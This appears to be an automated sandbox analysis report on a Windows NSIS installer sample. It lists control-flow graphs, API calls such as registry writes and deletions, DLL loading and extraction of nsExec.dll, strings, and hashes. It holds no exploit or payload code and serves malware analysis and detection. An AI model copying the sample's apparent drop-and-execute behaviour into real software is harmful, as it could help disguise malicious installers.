                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 580 406594-40659d 581 4065b0-4065ca 580->581 582 40659f-4065ae 580->582 583 4065d0-4065dc 581->583 584 4067da-4067e0 581->584 582->581 583->584 585 4065e2-4065e9 583->585 586 4067e6-4067f3 584->586 587 4065ee-4065fb 584->587 585->584 589 4067f5-4067fa call 406557 586->589 590 4067ff-406802 586->590 587->586 588 406601-40660a 587->588 591 406610-406653 588->591 592 4067c7 588->592 589->590 596 406659-406665 591->596 597 40676b-40676f 591->597 594 4067d5-4067d8 592->594 595 4067c9-4067d3 592->595 594->584 595->584 598 406667 596->598 599 40666f-406671 596->599 600 406771-406778 597->600 601 4067a3-4067a7 597->601 598->599 606 406673-406691 call 406425 599->606 607 4066ab-4066ae 599->607 604 406788-406794 call 406557 600->604 605 40677a-406786 call 40649e 600->605 602 4067b7-4067c5 lstrlenW 601->602 603 4067a9-4067b2 call 406594 601->603 602->584 603->602 614 406799-40679f 604->614 605->614 619 406696-406699 606->619 609 4066b0-4066bc GetSystemDirectoryW 607->609 610 4066c1-4066c4 607->610 615 40674e-406751 609->615 616 4066d6-4066da 610->616 617 4066c6-4066d2 GetWindowsDirectoryW 610->617 614->602 622 4067a1 614->622 620 406753-406756 615->620 623 406763-406769 call 406805 615->623 616->615 624 4066dc-4066fa 616->624 617->616 619->620 621 40669f-4066a6 call 406594 619->621 620->623 626 406758-40675e lstrcatW 620->626 621->615 622->623 623->602 628 4066fc-406702 624->628 629 40670e-406726 call 40694b 624->629 626->623 633 40670a-40670c 628->633 637 406728-40673b SHGetPathFromIDListW CoTaskMemFree 629->637 638 40673d-406746 629->638 633->629 635 406748-40674c 633->635 635->615 637->635 637->638 638->624 638->635
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
                                                              • GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 004066CC
                                                              • SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
                                                              • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                                              • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 0040675E
                                                              • lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,?,?,00000000,00000000,00424620,755723A0), ref: 004067B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                              • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                              • API String ID: 4024019347-2401076859
                                                              • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                              • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                                              • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                              • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 703 4032b9-4032d0 704 4032d2 703->704 705 4032d9-4032e2 703->705 704->705 706 4032e4 705->706 707 4032eb-4032f0 705->707 706->707 708 403300-40330d call 4034d4 707->708 709 4032f2-4032fb call 4034ea 707->709 713 4034c2 708->713 714 403313-403317 708->714 709->708 715 4034c4-4034c5 713->715 716 40346d-40346f 714->716 717 40331d-403366 GetTickCount 714->717 720 4034cd-4034d1 715->720 718 403471-403474 716->718 719 4034af-4034b2 716->719 721 4034ca 717->721 722 40336c-403374 717->722 718->721 725 403476 718->725 723 4034b4 719->723 724 4034b7-4034c0 call 4034d4 719->724 721->720 726 403376 722->726 727 403379-403387 call 4034d4 722->727 723->724 724->713 735 4034c7 724->735 729 403479-40347f 725->729 726->727 727->713 737 40338d-403396 727->737 732 403481 729->732 733 403483-403491 call 4034d4 729->733 732->733 733->713 741 403493-40349f call 4060f9 733->741 735->721 738 40339c-4033bc call 406aa6 737->738 745 4033c2-4033d5 GetTickCount 738->745 746 403465-403467 738->746 747 4034a1-4034ab 741->747 748 403469-40346b 741->748 749 403420-403422 745->749 750 4033d7-4033df 745->750 746->715 747->729 751 4034ad 747->751 748->715 754 403424-403428 749->754 755 403459-40345d 749->755 752 4033e1-4033e5 750->752 753 4033e7-403418 MulDiv wsprintfW call 4055dc 750->753 751->721 752->749 752->753 761 40341d 753->761 758 40342a-403431 call 4060f9 754->758 759 40343f-40344a 754->759 755->722 756 403463 755->756 756->721 764 403436-403438 758->764 760 40344d-403451 759->760 760->738 763 403457 760->763 761->749 763->721 764->748 765 40343a-40343d 764->765 765->760
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CountTick$wsprintf
                                                              • String ID: *B$ FB$ A$ A$... %d%%
                                                              • API String ID: 551687249-3833040932
                                                              • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                              • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
                                                              • Opcode Fuzzy Hash: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                                              • Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 766 401774-401799 call 402dab call 405e9d 771 4017a3-4017b5 call 406557 call 405e26 lstrcatW 766->771 772 40179b-4017a1 call 406557 766->772 777 4017ba-4017bb call 406805 771->777 772->777 781 4017c0-4017c4 777->781 782 4017c6-4017d0 call 4068b4 781->782 783 4017f7-4017fa 781->783 790 4017e2-4017f4 782->790 791 4017d2-4017e0 CompareFileTime 782->791 785 401802-40181e call 406047 783->785 786 4017fc-4017fd call 406022 783->786 793 401820-401823 785->793 794 401892-4018bb call 4055dc call 4032b9 785->794 786->785 790->783 791->790 796 401874-40187e call 4055dc 793->796 797 401825-401863 call 406557 * 2 call 406594 call 406557 call 405bb7 793->797 808 4018c3-4018cf SetFileTime 794->808 809 4018bd-4018c1 794->809 806 401887-40188d 796->806 797->781 829 401869-40186a 797->829 810 402c38 806->810 812 4018d5-4018e0 CloseHandle 808->812 809->808 809->812 816 402c3a-402c3e 810->816 814 4018e6-4018e9 812->814 815 402c2f-402c32 812->815 818 4018eb-4018fc call 406594 lstrcatW 814->818 819 4018fe-401901 call 406594 814->819 815->810 823 401906-4023a7 call 405bb7 818->823 819->823 823->815 823->816 829->806 831 40186c-40186d 829->831 831->796
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,?,00000031), ref: 004017B5
                                                              • CompareFileTime.KERNEL32(-00000014,?,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,?,00000031), ref: 004017DA
                                                                • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp$C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll$C:\Users\user\AppData\Local\acneform\Tjenestepligterne$Exec
                                                              • API String ID: 1941528284-4220020715
                                                              • Opcode ID: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                                              • Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
                                                              • Opcode Fuzzy Hash: 6570eeae84e5bb265c2249ceb719c511b69c24445da543620ab3fdc205d1b951
                                                              • Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 832 4055dc-4055f1 833 4055f7-405608 832->833 834 4056a8-4056ac 832->834 835 405613-40561f lstrlenW 833->835 836 40560a-40560e call 406594 833->836 838 405621-405631 lstrlenW 835->838 839 40563c-405640 835->839 836->835 838->834 840 405633-405637 lstrcatW 838->840 841 405642-405649 SetWindowTextW 839->841 842 40564f-405653 839->842 840->839 841->842 843 405655-405697 SendMessageW * 3 842->843 844 405699-40569b 842->844 843->844 844->834 845 40569d-4056a0 844->845 845->834
                                                              APIs
                                                              • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                              • lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                              • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                              • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll
                                                              • API String ID: 2531174081-4072277442
                                                              • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                              • Instruction ID: 906fe2e33ec339045028823105f1a28636d6cdc7c4a53a0106b9bb612f22f5f3
                                                              • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                              • Instruction Fuzzy Hash: 9121A171900158BACB119F65DD449CFBFB4EF45350F50843AF508B62A0C3794A50CFA8

                                                              Control-flow Graph

                                                              control_flow_graph 846 4068db-4068fb GetSystemDirectoryW 847 4068fd 846->847 848 4068ff-406901 846->848 847->848 849 406912-406914 848->849 850 406903-40690c 848->850 852 406915-406948 wsprintfW LoadLibraryExW 849->852 850->849 851 40690e-406910 850->851 851->852
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
                                                              • wsprintfW.USER32 ref: 0040692D
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941
                                                              Strings
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME
                                                              • API String ID: 2200240437-1106614640
                                                              • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
                                                              • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                              • Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

                                                              Control-flow Graph

                                                              control_flow_graph 853 402eae-402ed7 call 4063c4 855 402edc-402ee0 853->855 856 402f91-402f95 855->856 857 402ee6-402eea 855->857 858 402eec-402f0d RegEnumValueW 857->858 859 402f0f-402f22 857->859 858->859 860 402f76-402f84 RegCloseKey 858->860 861 402f4b-402f52 RegEnumKeyW 859->861 860->856 862 402f24-402f26 861->862 863 402f54-402f66 RegCloseKey call 40694b 861->863 862->860 864 402f28-402f3c call 402eae 862->864 869 402f86-402f8c 863->869 870 402f68-402f74 RegDeleteKeyW 863->870 864->863 871 402f3e-402f4a 864->871 869->856 870->856 871->861
                                                              APIs
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                              Similarity
                                                              • API ID: CloseEnum$DeleteValue
                                                              • String ID:
                                                              • API String ID: 1354259210-0
                                                              • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
                                                              • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                              • Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

                                                              Control-flow Graph

                                                              control_flow_graph 872 401c48-401c68 call 402d89 * 2 877 401c74-401c78 872->877 878 401c6a-401c71 call 402dab 872->878 880 401c84-401c8a 877->880 881 401c7a-401c81 call 402dab 877->881 878->877 884 401cd8-401d02 call 402dab * 2 FindWindowExW 880->884 885 401c8c-401ca8 call 402d89 * 2 880->885 881->880 897 401d08 884->897 895 401cc8-401cd6 SendMessageW 885->895 896 401caa-401cc6 SendMessageTimeoutW 885->896 895->897 898 401d0b-401d0e 896->898 897->898 899 401d14 898->899 900 402c2f-402c3e 898->900 899->900
                                                              APIs
                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Timeout
                                                              • String ID: !
                                                              • API String ID: 1777923405-2657877971
                                                              • Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                              • Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
                                                              • Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
                                                              • Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

                                                              Control-flow Graph

                                                              control_flow_graph 903 40248f-4024c0 call 402dab * 2 call 402e3b 910 4024c6-4024d0 903->910 911 402c2f-402c3e 903->911 912 4024d2-4024df call 402dab lstrlenW 910->912 913 4024e3-4024e6 910->913 912->913 917 4024e8-4024f9 call 402d89 913->917 918 4024fa-4024fd 913->918 917->918 920 40250e-402522 RegSetValueExW 918->920 921 4024ff-402509 call 4032b9 918->921 925 402524 920->925 926 402527-402608 RegCloseKey 920->926 921->920 925->926 926->911 928 402933-40293a 926->928 928->911
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000023,00000011,00000002), ref: 004024DA
                                                              • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 0040251A
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,00000000,00000011,00000002), ref: 00402602
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseValuelstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsbB152.tmp
                                                              • API String ID: 2655323295-627501760
                                                              • Opcode ID: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                                              • Instruction ID: e3d4462d3b771ebaa4f16124ca1672ddbf53c4078f16fd27a1e0ad00bfdc49f7
                                                              • Opcode Fuzzy Hash: f78f700b530699748f9fad481ce2e67ea2ae6cf6ef13030ba4708d919309f38a
                                                              • Instruction Fuzzy Hash: 8B117F31900118BEEB10EFA5DE59EAEBAB4EF54358F11443FF504B71C1D7B88E419A58
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00406094
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF
                                                              Strings
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-1331003597
                                                              • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
                                                              • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                              • Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768
                                                              APIs
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsbB152.tmp,C:\Users\user\AppData\Local\Temp\nsbB152.tmp, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,75573420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                • Part of subcall function 00405AAB: CreateDirectoryW.KERNELBASE(00437800,?), ref: 00405AED
                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\acneform\Tjenestepligterne,?,00000000,000000F0), ref: 00401652
                                                              Strings
                                                              • C:\Users\user\AppData\Local\acneform\Tjenestepligterne, xrefs: 00401645
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Local\acneform\Tjenestepligterne
                                                              • API String ID: 1892508949-3042626848
                                                              • Opcode ID: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                                              • Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
                                                              • Opcode Fuzzy Hash: 3fdecb0bba39e703bf4163983f1431fe553617167f418b1ef3a8f15efc1dcdc7
                                                              • Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E
                                                              APIs
                                                              • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Exec,?,00000000,00406696,80000002), ref: 0040646B
                                                              • RegCloseKey.KERNELBASE(?), ref: 00406476
                                                              Strings
                                                              Similarity
                                                              • API ID: CloseQueryValue
                                                              • String ID: Exec
                                                              • API String ID: 3356406503-459137531
                                                              • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction ID: 70129269225b3d2074805611e9e9ab3b6623f97616b55adb64abfcd2b3eb4ee3
                                                              • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                              • Instruction Fuzzy Hash: 3F017172540209AADF21CF51CC05EDB3BA8EB54364F114439FD1596190D738D964DBA4
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402108
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                • Part of subcall function 004055DC: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,0040341D,0040341D,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,00000000,00424620,755723A0), ref: 00405637
                                                                • Part of subcall function 004055DC: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsbB152.tmp\nsExec.dll), ref: 00405649
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: 673ead7fa0e448a1c5043ade6eeb1382bb3ed77738cd55eb2ad3f0262cc6e6ef
                                                              • Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
